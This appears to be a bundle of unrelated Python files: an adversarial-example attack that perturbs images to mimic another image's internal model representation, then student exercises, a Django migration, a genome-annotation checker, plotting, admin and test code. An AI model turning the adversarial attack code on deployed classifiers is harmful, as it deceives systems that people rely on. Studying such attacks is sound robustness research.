from utils.transform import calc_normalize
internal_val = 0
def get_internal_representation(model, img, k=-1):
model(img)
tk_source = internal_val
return tk_source
def hook(model, inputs):
global internal_val
internal_val = inputs[0]
class AdvarsarialLoss(nn.Module):
def __init__(self, attack_model, source, target, lamb=1, budget=0.3):
super(AdvarsarialLoss, self).__init__()
self.model = attack_model
self.source = source
self.target = target
self.tk_target = get_internal_representation(self.model, self.target)
self.lamb = lamb
self.budget = budget
def forward(self, img, tk_img):
term_internal = torch.dist(tk_img, self.tk_target)
dist_perturb = DSSIM(img, self.source)
term_perturb = dist_perturb - self.budget
term_perturb = term_perturb ** 2 if term_perturb > 0 else 0
res = term_internal + self.lamb * term_perturb
return res
class AdversarialAttack:
def __init__(
self,
model: nn.Module,
data_loader: BaseDataLoader,
optimizer: nn.Module,
loss_fn : nn.Module,
num_epochs : int,
budget : float,
lamb : float
):
self.model = model
self.data_loader = data_loader
self.optimizer = optimizer
self.loss_fn = loss_fn
self.num_epochs = num_epochs
self.budget = budget
self.lamb = lamb
def train(self):
source_img, source_label = self.data_loader.get_random_batch()
target_img, target_label = self.data_loader.get_random_batch()
assert (len(source_img) == len(target_img))
perturb_img = Variable(source_img.cuda(), requires_grad=True)
source_img = source_img.cuda()
target_img = target_img.cuda()
loss_fn = AdvarsarialLoss(self.model, source_img, target_img, self.lamb, self.budget)
for epoch in range(self.num_epochs):
tk_perturb = get_internal_representation(self.model, perturb_img)
self.optimizer.zero_grad()
loss = loss_fn(perturb_img, tk_perturb)
print('epoch {} : loss {}'.format(epoch, loss))
loss.backward()
self.optimizer.step()
|
# Save two movies you watched this year to a file called movie.txt in the current folder.
# Then add two movies you watched last year using append mode ("a").
# Read the file back with "r" to check that it was saved correctly.
f = open("movie.txt", "w")
for i in range(2):
movie = input("올해영화 : ")
f.write(movie + "\n")
f.close()
f = open("movie.txt", "a")
for i in range(2):
movie = input("작년영화 : ")
f.write(movie + "\n")
f.close()
f = open("movie.txt", "r")
while True:
line = f.readline() # read the file one line at a time
if line:
print(line,end="")
else:
break
f.close()
|
# Generated by Django 3.0.4 on 2020-03-13 15:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0007_auto_20200313_1533'),
]
operations = [
migrations.RemoveField(
model_name='wplyw',
name='inflow',
),
migrations.RemoveField(
model_name='wplyw',
name='outflow',
),
migrations.AddField(
model_name='wplyw',
name='flow',
field=models.CharField(choices=[('Wpływ', 'Wpływ'), ('Rozchód', 'Rozchód')], default='Wybierz', max_length=10),
),
migrations.AddField(
model_name='wplyw',
name='how_much',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=9999),
),
]
|
#!/usr/bin/env python
import sys
import os
import operator
import gffutils
import collections
import re
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
STOPCODONPAT = re.compile('.*[*#+].*')
fails = collections.defaultdict(lambda: collections.defaultdict(int))
def get_protein(fdb, mrna, seqs):
seq_exons = []
cdslist = list(fdb.children(mrna, featuretype='CDS'))
cdslist.sort(key=lambda f: f.start)
for c in cdslist:
seq_exons.append(str(seqs[c.seqid][c.start-1:c.end].seq))
gene_seq = Seq(''.join(seq_exons))
if mrna.strand == '-':
gene_seq = gene_seq.reverse_complement()
return str(gene_seq.translate())
def has_transcript(fdb, gene, seqs):
if sum(1 for i in
fdb.children(gene, featuretype=['mRNA','tRNA','snRNA',
'rRNA','snoRNA','ncRNA'])) == 0:
fails['gene']['has_transcript'] += 1
def children_in_coords(fdb, gene, seqs):
for c in fdb.children(gene):
if c.start < gene.start or c.end > gene.end:
fails['gene']['children_in_coords'] += 1
def children_consistent_strands(fdb, gene, seqs):
for c in fdb.children(gene):
if c.strand != gene.strand:
fails['gene']['children_consistent_strands'] += 1
def not_suspiciously_short(fdb, gene, seqs):
if gene.end - gene.start + 1 <= 30:
fails['gene']['not_suspiciously_short'] += 1
def n_content(fdb, mrna, seqs):
mrna_seq = seqs[mrna.seqid][mrna.start-1:mrna.end].seq.lower()
if mrna_seq.count('n')/float(mrna.end - mrna.start + 1) >= 0.5:
fails['mRNA']['n_content'] += 1
def has_CDS(fdb, mrna, seqs):
if sum(1 for i in fdb.children(mrna, featuretype='CDS')) == 0:
fails['mRNA']['has_CDS'] += 1
def has_only_CDS_and_UTR_children(fdb, mrna, seqs):
num_children = sum(1 for i in fdb.children(mrna))
num_cds_utr = sum(1 for i in fdb.children(mrna,
featuretype=['CDS','five_prime_UTR','three_prime_UTR']))
if num_children != num_cds_utr:
fails['mRNA']['has_only_CDS_and_UTR_children'] += 1
def minimum_length(fdb, mrna, seqs):
if mrna.end - mrna.start + 1 < 3:
fails['mRNA']['minimum_length'] += 1
def internal_stop_codon(fdb, mrna, seqs):
prot_seq = get_protein(fdb, mrna, seqs)
if STOPCODONPAT.match(prot_seq[:-1]):
fails['mRNA']['internal_stop_codon'] += 1
def has_no_children(fdb, cds, seqs):
if sum(1 for i in fdb.children(cds)) > 0:
fails['CDS']['has_no_children'] += 1
checks = {}
checks = { 'gene' : [has_transcript,
children_in_coords,
children_consistent_strands,
not_suspiciously_short],
'mRNA' : [n_content,
has_CDS,
has_only_CDS_and_UTR_children,
minimum_length,
internal_stop_codon],
'CDS' : [has_no_children] }
def main(gff_file, ref_file):
seqs = SeqIO.to_dict(SeqIO.parse(ref_file, "fasta"))
fdb = gffutils.FeatureDB(gff_file, keep_order=True)
#print get_protein(fdb, fdb['LmjF.12.0867:mRNA'], seqs)
#sys.exit()
for f in fdb.all_features():
if f.featuretype in checks:
for check in checks[f.featuretype]:
check(fdb, f, seqs)
for x in fails:
print(x)
for y in fails[x]:
print (y, fails[x][y])
if __name__ == "__main__":
if len(sys.argv) != 3:
print(__doc__)
sys.exit()
main(*sys.argv[1:])
|
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='acme',
version='0.0.1',
description='Example project showing how to include a Python package dependency while rendering notebooks with notebook-rendering',
author='Triage Technologies Inc.',
author_email='ai@triage.com',
url='https://www.triage.com/',
packages=find_packages(exclude=['tests', '.cache', '.venv', '.git', 'dist']),
install_requires=[
'Pillow',
'matplotlib',
]
)
|
'''
Created on Mar 3, 2015
@author: fan
'''
import unittest
from lang._math import pi2List
class SetTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_set(self):
print("type({}) = %s" % type({}), "type({1, 2, 3}) = %s" % type({1, 2, 3}))
_list = pi2List(10)
print("_list = %s" % _list)
_set = set(_list)
print("_set = %s" % _set)
def test_access_set(self):
s = set(range(0, 10))
print(s)
print("len(s) = %d" % len(s))
try:
print("s[1] = %d" % s[1])
print("s[1:5] = %s" % s[1:5])
except Exception as ex:
print(ex)
[print("%d ** 2 = %d" % (e, r ** 2)) for (e, r) in enumerate(s)]
def test_set_add(self):
a_set = {1, 2, 3}
print(type(a_set), len(a_set), a_set)
b_set = a_set
print("b_set = a_set", type(b_set), len(b_set), b_set)
a_set.add(0)
print("a_set", type(a_set), len(a_set), a_set)
print("b_set", type(b_set), len(b_set), b_set)
def test_remove(self):
a_set = {1, 2, 3}
print(a_set)
a_set.remove(2)
print("a_set.remove(2)", a_set)
a_set.remove(2)
print("a_set.remove(2)", a_set)
def test_discard(self):
a_set = {1, 2, 3}
print(a_set)
a_set.discard(2)
print("a_set.discard(2)", a_set)
a_set.discard(2)
print("a_set.discard(2)", a_set)
def test_update(self):
s1 = {1, 2, 3, 4, 5}
s2 = {2, 4, 6, 8, 10}
print(s1, s2)
s1.update(s2)
print("s1.update(s2)\n", s1, s2)
def test_pop(self):
s1 = set(range(0, 9))
print(len(s1), s1)
while (len(s1) > 0):
print(s1.pop(), '\t', len(s1), s1)
print(len(s1), s1)
print()
s1 = set([str(e) for e in range(0, 9)])
print(len(s1), s1)
while (len(s1) > 0):
print(s1.pop(), '\t', len(s1), s1)
print(len(s1), s1)
def test_clear(self):
s1 = set(range(0, 9))
print(len(s1), s1)
s1.clear()
print("s1.clear()\n", len(s1), s1)
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
import re
from operator import itemgetter, attrgetter, methodcaller
class Entry:
def __init__(self, id,weight, length):
self.id=id
self.weight=weight
self.length=length
self.diff=weight-length
self.ratio=float(weight)/length
f=open('jobs.txt','r')
number=int(f.readline())
#number=10
item_set=[]
#for i in range(number):
for i in range(number):
numbers = list(map(int, f.readline().split()))  # list() so it can be indexed below
item_set.append(Entry(i,numbers[0],numbers[1]))
for i in range(0):
print(item_set[i].id, item_set[i].diff, item_set[i].ratio)
item_set=sorted(item_set, key=attrgetter('weight'),reverse=True)
item_set=sorted(item_set, key=attrgetter('diff'),reverse=True)
for i in range(0):
print(item_set[i].id, item_set[i].diff, item_set[i].weight)
# print numbers
time = 0
sum = 0
for i in range(number):
time = time+item_set[i].length
sum = sum+time*item_set[i].weight
print(sum)
f.close()
|
import random
import time
from TagScriptEngine import Verb, Interpreter, block, adapter
blocks = [
block.MathBlock(),
block.RandomBlock(),
block.RangeBlock(),
block.StrfBlock(),
block.AssignmentBlock(),
block.FiftyFiftyBlock(),
block.LooseVariableGetterBlock()
]
x = Interpreter(blocks)
# data to inject
dummy = {
"message": adapter.StringAdapter("Hello, this is my message.")
}
def timerfunc(func):
"""
A timer decorator
"""
def function_timer(*args, **kwargs):
"""
A nested function for timing other functions
"""
start = time.time()
value = func(*args, **kwargs)
end = time.time()
runtime = end - start
msg = "The runtime for {func} took {time} seconds to complete 1000 times"
print(msg.format(func=func.__name__,
time=runtime))
return value
return function_timer
@timerfunc
def v2_test():
for i in range(1000):
x.process("{message} {#:1,2,3,4,5,6,7,8,9,10} {range:1-9} {#:1,2,3,4,5} {message} {strf:Its %A}", dummy)
if __name__ == '__main__':
v2_test()
|
#BMI Calculator
#HW6q1
#I pledge my honor that I have abided by the Stevens Honor System
def main():
weight = float(input("Enter your weight in pounds: "))
height = float(input("Enter your height in inches: "))
BMI = round((weight*720)/height**2, 3)
if BMI <= 0:
print("Error in calculating BMI. Weight cannot be negative.")
elif 0 < BMI < 19:
print("Your BMI is", BMI, "and is BELOW the healthy range.")
elif 19 <= BMI <= 25:
print("Your BMI is", BMI, "and is WITHIN the healthy range.")
else:
print("Your BMI is", BMI, "and is ABOVE the healthy range.")
main()
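# Worked example: weight = 150 lb, height = 68 in
#   BMI = (150 * 720) / 68**2 = 108000 / 4624 ≈ 23.356
# which lands in the 19-25 "healthy" branch above.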
|
# Python Standard Libraries
# N/A
# Third-Party Libraries
from rest_framework import serializers
# Custom Libraries
from api.models import User
from . import digger_model
class SignUpSerializer(serializers.ModelSerializer):
# Ensure passwords are at least 8 characters long, no longer than 128
# characters, and can not be read by the client.
password = serializers.CharField(max_length=128,
min_length=8,
write_only=True)
# The client should not be able to send a token along with a registration
# request. Making `token` read-only handles that for us.
token = serializers.CharField(max_length=255, read_only=True)
class Meta:
# Pretty sure this should be using the settings AUTH_USER_MODEL???
# model = settings.AUTH_USER_MODEL
model = User
fields = "__all__"
def create(self, validated_data):
new_user = User.objects.create_user(email=validated_data["email"],
password=validated_data["password"],
username=validated_data["username"])
# Digger is created to connect the play context with the user context
new_digger = digger_model.Digger.objects.create(linked_user=new_user)
return new_user
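# Usage sketch (e.g. from a view or a test); assumes email, username and
# password are the only required fields, and the values are illustrative:
def _example_signup():
    serializer = SignUpSerializer(data={
        "email": "jane@example.com",
        "username": "jane",
        "password": "a-strong-password",
    })
    serializer.is_valid(raise_exception=True)
    return serializer.save()  # dispatches to create() above, which also creates a Digger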
|
# color = input('Enter "green", "yellow", "red": ').lower()
# print(f'The user entered {color}')
# if color == 'green':
# print('Go!')
# elif color == 'yellow':
# print('Slow down!')
# elif color == 'red':
# print('Stop!')
# else:
# print('Bogus!')
hours = int(input('Enter hours worked:'))
rate = 10
overtime = int((hours - 40) * (1.5 * rate))
paycheck = 0
if hours <= 40:
paycheck += (int(hours * rate))
else:
paycheck += (int((40 * rate) + (overtime)))  # 40 regular hours at base rate plus 1.5x for the overtime hours
print(f'Pay: {paycheck}')
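# Worked example (with the overtime rule above): hours = 45, rate = 10
#   overtime = (45 - 40) * 1.5 * 10 = 75
#   paycheck = 40 * 10 + 75 = 475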
|
import nltk
f=open('cricket.txt','r',encoding='utf8')
raw=f.read()
#nltk.download('punkt')
tokens = nltk.word_tokenize(raw)
text = nltk.Text(tokens)
print(text)
for i in range(len(tokens)):
tokens[i]= tokens[i].lower()
#removing digits
tokens= [x for x in tokens if not x.isdigit()]
#converting list into strings
tokens_str=' '.join(tokens)
#Removing punctuation; the tokenizer automatically converts the string back to a list
from nltk.tokenize import RegexpTokenizer
tokenizer = RegexpTokenizer(r'\w+')
token_rem_punc= tokenizer.tokenize(tokens_str)
#Filtering the digits again
#tokens_NDP means NO DIGITS and PUNCTUATION
tokens_NDP= [x for x in token_rem_punc if not x.isdigit()]
#process to remove stopwords
nltk.download('stopwords')
from nltk.corpus import stopwords
#NO DIGITS PUNCTUATIONS AND STOPWORDS
tokens_NDPSW= [word for word in tokens_NDP if not word in set(stopwords.words('english'))]
#converting to string again to generate bigrams and trigrams
text_final = ' '.join(tokens_NDPSW)
#Generating Bi-grams
from nltk import ngrams
n1=2
bigrams=ngrams(text_final.split(),n1)
bigrams_list=[]
for x in bigrams:
bigrams_list.append(x)
#Generating tri-grams
n2=3
tri_grams=ngrams(text_final.split(),n2)
trigrams_list=[]
for x in tri_grams:
trigrams_list.append(x)
#Top 10 words in the tokens
count_list={} #creating the dictionary for word count
top10_list=[]
#Form the dictionary
for x in tokens_NDPSW:
c=tokens_NDPSW.count(x)
count_list[x]=c
#sorted_count_list is a list of tuples containing count of each word in the dictionary
import operator
sorted_count_list=sorted(count_list.items(),key=operator.itemgetter(1),reverse=True)
top10_list=sorted_count_list[0:10]
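#An equivalent (and faster) top-10 count using collections.Counter instead of the
#quadratic list.count loop above; ordering of ties may differ.
from collections import Counter
top10_counter = Counter(tokens_NDPSW).most_common(10)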
|
import scipy
from numpy import *
import scipy.integrate
# defining the fuction
def F(x):
return x * exp(-x)  # exp comes from the numpy star import (scipy.exp is removed in modern SciPy)
# Finding the integral
I, errt = scipy.integrate.quad(F,0,inf)
print('The integrated result =', int(round(I, 0)))
|
if True:
print("wow, look at that, it indented and it worked!")
"""
if True:
print("this code will not work because it lacks indentation, which is why it is commented out!")
"""
|
import numpy as np
import pandas as pd
class TrainingDataLabelPreprocessor:
def __init__(self, training_data):
# eg. training_data = pd.read_csv('train/train.csv')
self.training_data = training_data
# Create a dictionary assigning labels to each
# of the 28 cell functions/locations
self.label_names = {
0: "Nucleoplasm",
1: "Nuclear membrane",
2: "Nucleoli",
3: "Nucleoli fibrillar center",
4: "Nuclear speckles",
5: "Nuclear bodies",
6: "Endoplasmic reticulum",
7: "Golgi apparatus",
8: "Peroxisomes",
9: "Endosomes",
10: "Lysosomes",
11: "Intermediate filaments",
12: "Actin filaments",
13: "Focal adhesion sites",
14: "Microtubules",
15: "Microtubule ends",
16: "Cytokinetic bridge",
17: "Mitotic spindle",
18: "Microtubule organizing center",
19: "Centrosome",
20: "Lipid droplets",
21: "Plasma membrane",
22: "Cell junctions",
23: "Mitochondria",
24: "Aggresome",
25: "Cytosol",
26: "Cytoplasmic bodies",
27: "Rods & rings"
}
self.label_names_reversed_keys = dict((value, key) for key, value in self.label_names.items())
def preprocess_data(self):
self.multi_hot_encode()
self.apply_number_of_targets_col()
def fill_targets(self, row):
# Multi hot encode the training data and correct responses
row.Target = np.array(row.Target.split(" ")).astype(int)
for num in row.Target:
name = self.label_names[int(num)]
row.loc[name] = 1
return row
def multi_hot_encode(self):
for key in self.label_names.keys():
self.training_data[self.label_names[key]] = 0
self.training_data = self.training_data.apply(self.fill_targets, axis=1)
def apply_number_of_targets_col(self):
self.training_data["number_of_targets"] = self.training_data.drop(
["Id", "Target"],axis=1).sum(axis=1)
|
import datetime
import csv
import itertools
import numpy as np
import matplotlib.pyplot as plt
import scipy as sp
import scipy.signal as signal
now = datetime.datetime.now()
def graficar_temp():
tiempo=[]
temperatura=[]
with open('data.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
temp=float(row[0])
time=float(row[4])
temperatura.append(temp)
tiempo.append(time)
fig1=plt.figure(1)
ax = fig1.add_subplot(1, 1, 1)
axes = plt.gca()
axes.set_xlim([0,24])
axes.set_ylim([0,30])
# Major ticks every 1 hour, minor ticks every 0.5 hours
major_ticks = np.arange(0, 23.1, 1)
minor_ticks = np.arange(0, 23.1, 0.5)
ax.set_xticks(major_ticks)
ax.set_xticks(minor_ticks, minor=True)
# ax.set_yticks(major_ticks)
# ax.set_yticks(minor_ticks, minor=True)
plt.plot(tiempo,temperatura, 'm')
plt.xlabel('Tiempo (horas)')
plt.ylabel('Temperatura (C)')
plt.title('Temperatura')
plt.grid(True)
plt.savefig("graphT.png")
#plt.show()
def graficar_nivel():
tiempo=[]
distancia=[]
with open('data.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
time=float(row[4])
dist=float(row[1])
tiempo.append(time)
distancia.append(dist)
distancia_f=sp.signal.medfilt(distancia,21)
print(len(tiempo))
print(len(distancia_f))
fig3=plt.figure(3)
ax = fig3.add_subplot(1, 1, 1)
axes = plt.gca()
axes.set_xlim([0,24])
axes.set_ylim([0,100])
# Major ticks every 1 hour, minor ticks every 0.5 hours
major_ticks = np.arange(0, 23.1, 1)
minor_ticks = np.arange(0, 23.1, 0.5)
ax.set_xticks(major_ticks)
ax.set_xticks(minor_ticks, minor=True)
# ax.set_yticks(major_ticks)
# ax.set_yticks(minor_ticks, minor=True)
plt.plot(tiempo,distancia_f, 'm')
plt.xlabel('Tiempo (horas)')
plt.ylabel('Porcentaje nivel de alimento')
plt.title('Nivel de alimento')
plt.grid(True)
plt.savefig("graphA.png")
#plt.show()
def graficar_hum():
tiempo=[]
humedad=[]
with open('data.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
time=float(row[4])
humed=float(row[2])
tiempo.append(time)
humedad.append(humed)
fig2=plt.figure(2)
ax = fig2.add_subplot(1, 1, 1)
axes = plt.gca()
axes.set_xlim([0,24])
axes.set_ylim([0,100])
# Major ticks every 1 hour, minor ticks every 0.5 hours
major_ticks = np.arange(0, 23.1, 1)
minor_ticks = np.arange(0, 23.1, 0.5)
ax.set_xticks(major_ticks)
ax.set_xticks(minor_ticks, minor=True)
# ax.set_yticks(major_ticks)
# ax.set_yticks(minor_ticks, minor=True)
plt.plot(tiempo,humedad,'m')
plt.xlabel('Tiempo (horas)')
plt.ylabel('Humedad ')
plt.title('Humedad vs Tiempo')
plt.grid(True)
plt.savefig("graphH.png")
#plt.show()
def graficar_luminosidad():
tiempo=[]
luminosidad=[]
with open('data.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
time=float(row[4])
lum=float(row[3])
tiempo.append(time)
luminosidad.append(lum)
fig4=plt.figure(4)
ax = fig4.add_subplot(1, 1, 1)
axes = plt.gca()
axes.set_xlim([0,24])
axes.set_ylim([0,100])
# Major ticks every 1 hour, minor ticks every 0.5 hours
major_ticks = np.arange(0, 23.1, 1)
minor_ticks = np.arange(0, 23.1, 0.5)
ax.set_xticks(major_ticks)
ax.set_xticks(minor_ticks, minor=True)
# ax.set_yticks(major_ticks)
# ax.set_yticks(minor_ticks, minor=True)
plt.plot(tiempo,luminosidad, 'm')
plt.xlabel('Tiempo (horas)')
plt.title('Luminosidad')
plt.grid(True)
plt.savefig("luz.png")
#plt.show()
#graficar_temp()
#graficar_nivel()
#graficar_hum()
#graficar_luminosidad()
|
#Dict-based spectral encoding of given traits via dictionary word-matching.
#Dominic Burkart
#Use: read every .txt wordlist saved in the same directory as this file for a given
# trait (e.g. emotionality), then encode a given set of tweets with (1) the count of
# dictionary words in each tweet and (2) the ratio of dictionary words in the tweet
# to the total number of words in the tweet.
#For the MEC project. Current version: 20 November 2015 (version 6).
# -assumes that words in a tweet are separated by spaces/punctuation to allow tokenization
# -no error checking for faulty input.
#get filepath for data + content index
inputfiledir = input("\ndata file directory: ")
tw_content_indx = int(input("tweet text index in input file (usually 10): "))
print("\n")
#using standard modules
import csv
import os
#code for cleaning up strings (in dictionaries and in tweets)
punctuation = '''!"#$%&'()*+,-./:;<=>?[\]^_`{|}~'''#missing @ at the request of Julian
def clean(instring, spaces = True): #removes punctuation and double spaces, replacing them w/ single spaces
instring.replace("\n"," ")
for x in punctuation:
instring = instring.replace(x, " ")
if spaces:
while instring.find(" ") > -1:
instring = instring.replace(" ", " ")
else:
while instring.find(" ") > -1:
instring = instring.replace(" ","")
instring = instring.lower()
return instring
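#Example: clean("Hello, WORLD!!") -> "hello world " (punctuation replaced by
#spaces, runs of spaces collapsed, lowercased), while
#clean("Hello, WORLD!!", spaces = False) -> "helloworld".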
#gets dictionaries
curlist = os.listdir(os.getcwd())
temp = []
wordlists = [] #will hold individual words (eg fun)
stemlists = [] #will hold stems (eg funn*)
listnames = [] #will hold the names of keyword files (to be used as variable names)
i = 0
for fname in curlist:
if fname.endswith(".txt"): #new list of keywords!
wordlists.append([])
stemlists.append([])
temp.append(open(fname, encoding = "utf-8").read().splitlines())
i_of_x = 0
for x in temp[i]:
if temp[i][i_of_x].find("*") > -1:
stemlists[i].append(clean(temp[i][i_of_x], spaces = False))
else:
wordlists[i].append(clean(temp[i][i_of_x], spaces = False))
i_of_x += 1
uncheckedSpace = True
uncheckedBlank = True
while uncheckedSpace or uncheckedBlank:
try:
wordlists[i].remove(" ")
except ValueError:
uncheckedSpace = False
try:
wordlists[i].remove("")
except ValueError:
uncheckedBlank = False
print("Imported dictionary: "+fname)
i += 1
listnames.append(fname.split(".")[0])
print("\n")
#creates list of output datafield names based on wordlist file names
temp = []
for x in listnames:
temp.append(x+"Count")
for x in listnames:
temp.append(x+"Ratio")
listnames = temp
#removes duplicates
for x in range(len(wordlists)):
wordlists[x] = set(wordlists[x])
#opens our data and output files
indoc = open(inputfiledir, encoding = "utf-8")
out = open("SpectralEncodingOut.csv", mode = "w", encoding = "utf-8")
outdoc= csv.writer(out, lineterminator ="\n")
tagOut = open("hashtagDict.csv", mode = "w", encoding = "utf-8")
hashtagDict = csv.writer(tagOut, lineterminator = "\n")
#takes a line from the in data and encodes it
def findInTweet(line, wordlists):
hashtagCheck(line)
content = clean(line[tw_content_indx]).split(" ")
counts = []
ratios = []
for x in range(len(wordlists)):
counts.append(0) #populates number of variables (eg emotionality)
ratios.append(0)
for lists in wordlists: #start by grabbing words
for word in lists:
counts[wordlists.index(lists)] += content.count(word)
for lists in stemlists: #then grab stems
for stem in lists:
for token in content:
if token.startswith(stem):
counts[stemlists.index(lists)] += 1
for x in range(len(counts)): #same as len(wordlists)
ratios[x] = counts[x]/len(content)
line.extend(counts)
line.extend(ratios)
outdoc.writerow(line)
#takes a line from the in data and encodes it
def showTokens(line):
content = clean(line[tw_content_indx]).split(" ")
words = []
for lists in wordlists: #start by grabbing words
for word in lists:
if word in content:
words.append(word)
for lists in stemlists: #then grab stems
for stem in lists:
for token in content:
if token.startswith(stem):
words.append(token)
return words
#finds the end of a hashtag for hashtagCheck
notTag = list(''' !"#$%&'()*+,-./:;<=>?[\]^_`{|}~''')
def final(t):
last = 1
while last < len(t):
if t[last] in notTag:
return last
last +=1
return last
#holds our hashtags
hashtags = {}
def hashtagCheck(line):
toks = line[tw_content_indx].split(" ")
for t in toks:
if t.startswith("#"):
last = final(t)
try:
hashtags[t[1:last]] += 1
except KeyError:
hashtags[t[1:last]] = 1
#iterates through the input file, calling the methods to find and write output.
inheader = True
for line in csv.reader(indoc):
if inheader: #to copy over header to the new doc + add the new columns :)
line.extend(listnames)
outdoc.writerow(line)
print("populating output file, please wait.")
inheader = False
else: #to count words + ratios for each tweet and then write those values to out :)
findInTweet(line,wordlists)
print("\nencoding complete.")
print("\nSaving hashtag dictionary.")
for h in hashtags:
line = [h, hashtags[h]]
hashtagDict.writerow(line)
indoc.close()
out.close()
tagOut.close()
print("\n Program complete.")
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
optickscore-/tests/IndexerTest
================================
GPU and CPU indices mismatch
-----------------------------
Maybe a stable sort type of issue.
In any case discrepancies are all in the low frequency of occurence tail,
so probably acceptable.
::
seqhis
[[ 28 29]
[ 22 23]
[ 23 22]
[ 32 255]
[ 23 22]
[ 28 29]
[255 32]
[ 31 30]
[ 22 23]
[ 23 22]
[ 31 30]
[ 23 22]
[ 23 22]
[ 22 23]
[ 22 23]
[ 31 30]
[ 29 31]
[ 23 22]
[ 32 255]
[ 22 23]
[255 32]
[ 22 23]
[ 28 29]
[ 22 23]
[ 23 22]
[ 29 31]
[ 30 28]
[ 30 28]
[ 30 28]
[ 29 31]]
"""
import os, logging, numpy as np
log = logging.getLogger(__name__)
from opticks.ana.ana import Evt
def compare(a, b):
return np.vstack([a,b]).T[a != b]
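# A hedged, toy illustration (not Opticks data): compare() keeps only the
# stacked (a, b) pairs at positions where the two index arrays disagree.
assert (compare(np.array([1, 2, 3]), np.array([1, 9, 3])) == np.array([[2, 9]])).all()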
if __name__ == '__main__':
typ = "torch"
tag = "4"
det = "dayabay"
cat = "PmtInBox"
evt = Evt(tag=tag, src=typ, det=cat)
print evt
ps = np.load("/tmp/phosel.npy")
print "seqhis\n", compare(evt.ps[:,0,0], ps[:,0,0])
print "seqmat\n", compare(evt.ps[:,0,1], ps[:,0,1])
|
#!/usr/bin/env python
#coding:utf-8
import sys
serverid = 1
|
import xadmin
from .models import ProductMsg
from .models import Supplier
from .models import TicketsMsg
from .models import HotelMsg
from .models import StrategyMsg
from .models import Product_City
from .models import Product_Senic
# Register your models here.
# In xadmin, admin classes here inherit from object instead of admin.ModelAdmin
class ProductMsgAdmin(object):
    # Columns to display
list_display = ['id', 'name', 'traver_days',
'product_type', 'supplier',
'product_link', 'score', 'sell_num']
    # Searchable fields
search_fields = ['id','name', 'product_type']
    # Filter fields
list_filter = ['id', 'name', 'supplier',
'product_link', 'score', 'sell_num']
class ProductCityAdmin(object):
    # Columns to display
list_display = ['product_id', 'city_id', 'product_price']
    # Searchable fields
search_fields = ['city_id','product_id']
    # Filter fields
list_filter = ['product_id', 'city_id', 'product_price']
class ProductScenicAdmin(object):
    # Columns to display
list_display = ['product_id', 'senic_name']
    # Searchable fields
search_fields = ['senic_name','product_id']
    # Filter fields
list_filter = ['product_id', 'senic_name']
class SupplierAdmin(object):
    # Columns to display
list_display = ['id', 'name', 'link_url', 'cooperation_type']
    # Searchable fields
search_fields = ['name', 'cooperation_type']
    # Filter fields
list_filter = ['id', 'name', 'link_url', 'cooperation_type']
class TicketMsgAdmin(object):
    # Columns to display
list_display = ['id', 'scenic_name', 'city_name', 'img_url', 'score','ticket_link', 'scense_address',
'ticket_price']
    # Searchable fields
search_fields = ['id','scenic_name','city_name']
    # Filter fields
list_filter = ['id', 'scenic_name','city_name', 'ticket_content', 'ticket_price']
class HotelMsgAdmin(object):
    # Columns to display
list_display = ['name', 'score', 'hotel_price', 'img_url','hotel_link',
'hotel_content', 'city_name', 'supplier_id' ]
    # Searchable fields
search_fields = ['name','hotel_content', 'city_name']
    # Filter fields
list_filter = ['id', 'name', 'score', 'hotel_price','city_name',
'img_url', 'supplier_id', 'hotel_link']
class StrategyMsgAdmin(object):
    # Columns to display
list_display = ['id', 'title', 'link_url', 'simple_content', 'supplier_id', 'img_url', 'scenic_name']
    # Searchable fields
search_fields = ['title', 'link_url']
    # Filter fields
list_filter = ['id', 'title', 'link_url', 'simple_content', 'supplier_id', 'img_url', 'scenic_name']
# Bind the admin configuration classes above to views by registering the models with xadmin
xadmin.site.register(Supplier, SupplierAdmin)
xadmin.site.register(ProductMsg, ProductMsgAdmin)
xadmin.site.register(TicketsMsg, TicketMsgAdmin)
xadmin.site.register(HotelMsg, HotelMsgAdmin)
xadmin.site.register(StrategyMsg, StrategyMsgAdmin)
xadmin.site.register(Product_Senic, ProductScenicAdmin)
xadmin.site.register(Product_City, ProductCityAdmin)
|
#!/usr/bin/python
import numpy as np
import os
numpul=20 #Number of PPTA pulsars.
for pulsi in xrange(numpul):
gfilename='G_SNR_z_vs_mc_PPTA_model_i/pulsar_%s.gstar' %(pulsi+1)
#Content of the gstar file:
filetext=['#!/bin/csh \n\
#PBS -q gstar \n\
#PBS -l nodes=1:ppn=6 \n\
#PBS -l pmem=500mb \n\
#PBS -l walltime=10:00:00 \n\
#PBS -N O_pulsar_%s \n\
#PBS -o O_output_pulsar_%s \n\
#PBS -e O_error_pulsar_%s \n\
\n\
echo Deploying job to CPUs ... \n\
cat $PBS_NODEFILE \n\
\n\
python /home/prosado/horizon/python/SNR_z_vs_mc_PPTA_model_i.py %s' %(pulsi+1,pulsi+1,pulsi+1,pulsi)]
np.savetxt(gfilename, filetext, fmt='%s', newline='\n')
task='qsub ./'+gfilename
print task
os.system(task)
|
"""Unit test for treadmill.runtime.linux.runtime.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import os
import shutil
import tempfile
import unittest
# Disable W0611: Unused import
import tests.treadmill_test_skip_windows # pylint: disable=W0611
import mock
from treadmill import exc
from treadmill import services
from treadmill import utils
from treadmill.appcfg import abort as app_abort
